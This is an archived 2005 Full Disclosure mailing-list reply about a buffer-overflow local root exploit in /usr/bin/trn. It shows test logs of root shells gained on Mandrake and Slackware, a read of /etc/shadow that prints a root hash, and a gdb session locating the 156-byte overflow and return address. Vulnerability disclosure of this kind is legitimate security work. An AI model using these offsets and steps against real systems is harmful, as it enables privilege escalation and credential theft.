Full Disclosure mailing list archives
Re: /usr/bin/trn local root exploit
From: "Z z a g o r R" <zzagorrzzagorr () hotmail com>
Date: Wed, 26 Jan 2005 13:24:21 +0000
/*
---------------------------------------
TEST MANDRAKE 9.2

sh-2.05b# cat /proc/version
Linux version 2.4.22-10mdk (nplanel () no mandrakesoft com) (gcc version 3.3.1 (Mandrake Linux 9.2 3.3.1-2mdk)) #1 Thu Sep 18 12:30:58 CEST 2003
sh-2.05b# rpm -qa trn
trn-3.6-17mdk
sh-2.05b# chmod +s /usr/bin/trn
chmod +s /usr/bin/trn
sh-2.05b#
sh-2.05b# ls -al /usr/bin/trn
ls -al /usr/bin/trn
-rwsr-sr-x    1 root     root       233624 Jan 10  2003 /usr/bin/trn
sh-2.05b# exit
sh-2.05b$ ./trn 0xbfffff96
sh-2.05b# id
uid=0(root) gid=4294967295 groups=4294967295
sh-2.05b#
sh-2.05b# cat /etc/shadow
cat /etc/shadow
root:$1$HC7/pHcz$L0w/RpmeVEF9Xbnf7iHjv/:12554:0:99999:7:::
....
---------------------------------------
TEST SLACKWARE 10.0.0 (not suid)

bash-2.05b$ cat /etc/slackware-version
Slackware 10.0.0
bash-2.05b$ cat /proc/version
Linux version 2.4.26 (root@root) (gcc version 3.3.4) #2 Mon Jun 14 19:05:05 PDT 2004
bash-2.05b$ uname -a
Linux nyg 2.4.26 #2 Mon Jun 14 19:05:05 PDT 2004 i686 unknown unknown GNU/Linux
bash-2.05b$ ./a 0xbfffff98
sh-2.05b$
----------------------------------------
TEST SLACKWARE 9.1.0

sh-2.05b$ ./trn 0xbfffff84
./trn 0xbfffff84
sh-2.05b#
sh-2.05b# id
id
uid=0(root) gid=98(nobody) groups=98(nobody)
*/

/*
RETADDR? (mandrake...)

sh-2.05b$ gdb ./trn
gdb ./trn
GNU gdb 5.3-25mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...
(no debugging symbols found)...
(gdb)
(gdb) r `perl -e 'print "A" x 156'`          --------->BUFFER=>156
(gdb) r `perl -e 'print "A" x 156'`
Starting program: /usr/bin/trn `perl -e 'print "A" x 156'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x0805ad05 in strcpy ()
(gdb) i r
eax            0x0      0
ecx            0x8087244        134771268
edx            0xbffff850       -1073743792
ebx            0x41414141       1094795585
esp            0xbffff931       0xbffff931
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x805ad05        0x805ad05
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb) x/1000x $esp
0xbffff931:     0x2c080872      0x01bfffff      0x01000000      0x41000000
.
..
...
---Type <return> to continue, or q <return> to quit---
....
.....
......
---Type <return> to continue, or q <return> to quit---
.......
........
.........
---Type <return> to continue, or q <return> to quit---
..........
...........
............
---Type <return> to continue, or q <return> to quit---
0xbffffef1:     0x0effffff      0xff000000      0x0fffffff      0x1a000000
0xbfffff01:     0x00bfffff      0x00000000      0x00000000      0x00000000
0xbfffff11:     0x00000000      0x00000000      0x38366900      0x752f0036
0xbfffff21:     0x622f7273      0x742f6e69      0x41006e72      0x41414141
0xbfffff31:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff41:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff51:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff61:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff71:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff81:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff91:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffa1:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffb1:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffc1:     0x41414141      0x00414141      0x622f3d5f      0x732f6e69
0xbfffffd1:     0x57500068      0x752f3d44      0x622f7273      0x48006e69
0xbfffffe1:     0x3d454d4f      0x4853002f      0x3d4c564c      0x752f0031
0xbffffff1:     0x622f7273      0x742f6e69      0x00006e72
Cannot access memory at address 0xbffffffd
(gdb)
*/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
